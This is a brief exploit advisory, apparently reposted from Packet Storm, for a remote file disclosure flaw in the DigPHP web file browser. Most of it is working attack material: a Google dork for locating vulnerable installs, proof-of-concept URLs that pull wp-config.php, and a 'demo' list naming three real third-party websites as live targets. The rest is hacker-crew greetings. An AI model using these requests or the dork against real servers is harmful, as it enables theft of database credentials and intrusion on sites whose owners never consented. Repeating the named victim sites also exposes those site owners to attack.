DigPHP, the web based file browser, suffers from a remote file disclosure vulnerability.
137ed2183213444ec50bf2684d013c77e6db58c57e7fbdb23e6d44bacd5f9f38##################################################
# Exploit Title: DigPHP - Web Based File Browser <= Remote File Disclosure Vulnerability
# Date: 26/06/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# version: -
# Vendor or Software Link: http://sourceforge.net/projects/digphp/
# Google dork: inurl:/dig.php?dir=./
# Tested on: Linux
##################################################
[~]Exploit/p0c :
http://localhost:80/dig.php?ns=
http://localhost:80/dig.php?action=file&dir=./&name=wp-config.php&ext=php
[~]Dem0 :
http://geo.wagner.free.fr/dig.php?action=file&dir=
http://pratclif.com/dig.php?dir=
http://ratcliffephotos.free.fr/dig.php?dir=
FB : www.fb.me/justryuz
+---------------------------------------------------+
Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC ]
[ And all my Freinds + Malaysian + Indonesia + Gaza + Turki + GaySec + Xadna ]
-----------------------------------------------------+
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed